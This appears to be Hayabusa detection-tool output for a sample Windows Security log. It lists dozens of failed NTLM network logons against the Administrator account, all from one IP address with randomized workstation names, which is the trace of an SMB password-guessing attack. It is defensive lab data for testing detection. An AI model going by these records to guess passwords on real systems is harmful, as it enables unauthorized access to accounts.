2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I6mBM2WMWlKkQHZl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3jo7coI8uS8JCorc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1ao6QcPI3nzpNnHi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WkP8vstCEOH9wnUW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QzrhcYEue85zhZ8V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ivpdjGaxoZOCTxbq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qIsZXHE4Swkbytiu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bdT2bVjtEd6KhQWf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RT9Tqp0lf0dd6h9C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xwhlrl2ck1o2qTDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lxX2762Fa804981t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O55rRqTo9vgwnYoq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zo7BzxXZDdykOXoZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6YGEMcvYtwNJys39  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V0xq8et2LwWSgVgk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 43EK0cGlZBhWRd5B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UBoGMdTjWVVVvifn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IcCrPXp3VLObGU6v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zhZguuPimqAruiTu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5o6amdSWFFbueCyp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W0wRaNXdhMlIY1HX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J8jqrrwWeKZGypW0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8LIavw2zakOP4DqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qz7gr4vA633waQ01  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2TmHz5POLSNJHm2x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DcpOxhy2nnLIEGHT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gJxfDgfujy5Um2wa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 217VTq8EbYIDeSXU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WPfE1m0tsJAJnRt9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OQCfGhvBMSq3PIoa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XBl6JIRetWEnjaVx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KXJMNnj4LeBIYARt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v3sdn9f4xtvcsaHp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DWT0NepMYD29cOwh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DDb7wV6uzj1tat2d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RBcmANUL4a6DFobS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VL2swHF9MtnCfnp3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E0ZkcAD0IakqSUph  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5HgksdIGukmliZeE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:07.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xYoLckmmOWCSf4Q2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2PTxr8Zkz2y2XwBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J3caypkIM2XqoSSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yuQOUzJ6sU5AhARR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SyM3OrjUHub9k23k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vY7SRoWumGQOrljW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iFrO2nUMlfeDLGyc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.250 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9B8Gq7d30U8DqdN0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yxSPuxpCHgSo1d1a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9elGZ4POExblUCAK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XHY9Ig3sqQKNXYqq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: voMDzTqYqKpfudKo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m8m9SJ1aFpvFqClU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dM84lQYVfHhZmgpK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O5FrdBbYXWaqFkeb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZxiNMjsd3YfoCNa2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v1u5uD9SiDFq9VOD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.675 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pZv9l3b7U8tIVmw8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7EfPqiBhm6hRX700  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.763 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3uvqgri2KGIDAlg1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oLXZMXKsjOaurgZV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nXtiRWHDJqpq69Ej  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OeC1T9YkT1hXMcGG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:08.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YPf6nlwAeuu7cf00  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4fvVUozD2RuIchN4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KP3rghcrgas3l3q1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MMtcQYoVoM57gTcj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IFjTWECEep09Abjt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jUlguy8tKBo4DSUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GETwMERLpiVtMRkw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bhas9Vjc193EVcOg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OmVAnxq39t7qbcEs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 13y2nnltjipwZqth  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wDQrPBL1VodIcQLR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
